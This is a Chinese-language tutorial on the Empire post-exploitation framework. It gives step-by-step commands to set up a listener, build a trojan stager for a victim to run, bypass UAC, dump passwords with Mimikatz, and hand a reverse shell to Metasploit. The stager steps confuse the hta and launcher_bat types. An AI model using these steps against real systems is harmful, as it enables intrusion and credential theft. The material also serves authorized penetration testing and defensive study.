一、前言
Empire是一个PowerShell后期漏洞利用代理工具同时也是一款很强大的后渗透测神器,它建立在密码学、安全通信和灵活的架构之上。Empire实现了无需powershell.exe就可运行PowerShell代理的功能。快速部署后期漏洞利用模块,从键盘记录器到Mimikatz,并且能够适应通信躲避网络检测,所有的这些功能都封装在一个以实用性为重点的框架中
二、empire使用详解
1.Empire 的安装
git clone https://github.com/EmpireProject/Empire.git
unzip Empire-master.zip
cd Empire-master
cd setup/
./install.sh
(最后输入数据库密码)
2.设置监听
cd Empire-master
./empire
(Empire) > help #主菜单帮助命令
(Empire) > listeners #查看本地监听代理地址,现在还没有会话代理,所以为空
进入后需要使用监听种类,输入 uselistener 加空格然后两下 tab 可列出所有的可使用监听类,这里我们使用 http
(Empire: listeners) > info #列出详细信息
(Empire: listeners) > set Name bk #设置Name为bk
(Empire: listeners) > execute #执行命令,这条命令将其name设置生效
至此,监听工作完成。我们开始配置生成后门。
3、生成木马
设置好监听后通过 back 命令返回上一级,然后使用 usestager 命令来指定生成木马的类型,通过空格加两下 tab 可查看所有生成文件的类型,这里我们使用 windows/hta,即 windows 平台下的 hta文件,同样,通过 info 查看此模块的详细信息。
(Empire: listeners/http) > back #返回上层模块
(Empire: listeners/http) > usestager #空格加两下tab
生成的文件类型大体有三类,multi 开头的是通用类,osx 开头即 mac 使用,windows 即 win 平台使用。
(Empire: listeners) > usestager windows/launcher_bat bk # 选择木马种类
这里选择的是hta类型的脚本,当然也可以选择其他的。后面的bk就是刚刚设置的监听,这个模块就是依据监听的配置信息,生成相应的木马,让反弹马找到连接主机。
(Empire: stager/windows/launcher_bat) > info #查看需要配置的参数信息
(Empire: stager/windows/hta > execute #执行生成木马
将代码保存为hta文件,放到服务器上。
在目标机器上访问
运行命令后,我们回到我们的机器可以看到已经获取到了客户端的一个会话
(Empire: stager/windows/launcher_bat) > agents #查看获取的代理会话
一个会话已经建立完成。
(Empire: agents) > rename DPFXWKY9 win10 #更改会话名字
(Empire: agents) > interact win10 #和该会话交互
我们通过 help 可查看一些命令和一些提供的内网渗透常用的工具
4、提权
如果想执行 windows 系统自带的命令,可以通过 shell 加命令的格式,例如查看当前 shell 的权限,我们输入 shell whoami /groups,返回了 medium 即非高权限,如下图:
非高权限的话,很多命令使用会有限制,例如 mimikatz,所以下面需要提升权限,这里我们使用 bypassuac,首先 empire 提供了很多使用模块,这里我们通过 usemodule 空格加两下 tab 可查看全部模块,有二百多个,如下图:
bypassuac 提权我们使用 usemodule privesc/bypassuac 这个模块,然后 info 查看其信息,如下图:
这里我们需要设置的参数还是 Listener,即监听的名称,这里是 bk,如下图:
设置后通过 execute 执行,成功后会返回一个新的 shell
随后我们通过 agents 查看已有的 shell,username 前带 * 号的就是高权限已经提权成功的 shell。
这时 mimikatz 已可以使用,输入 mimikatz 来获取目标账号密码,如下图:
通过 mimikatz 获取后,若在内网机器较多,为了查看方便,我们可以通过 creds 命令来直接列出其密码,如下图:
5、反弹shell给msf
empire 若需要结合 msf 使用,则可以将得到的 shell 反给 msf,使用模块 code_execution/invoke_shellcode,info 信息如下:
这里需要设置下Lhost 和Lport,Lhost 即 msf 所在机器的 ip,Lport 即 msf 监听反弹 shell 的端口,还有一个参数注意下,就是payload,默认值是 reverse_https,这个不用改,我们 msf 设置监听时 payload 需要和其一致,也需要设置成 reverse_https,设置后我们先不执行 execute 命令,先把 msf 监听设置好:
msf 的 payload 设置为 windows/meterpreter/reverse_https,Lhost 为本机所在的 ip,Lport 端口和刚才 empire 设置的一样,这里是 4444,然后 exploit 执行监听,这时返回 empire 执行 execute,停一会会看到 msf 已经收到了 shell,如下图:
返回 shell 后,我们可以执行 whoami /groups 看下权限,可以看到返回的是高权限的 shell,如下图:
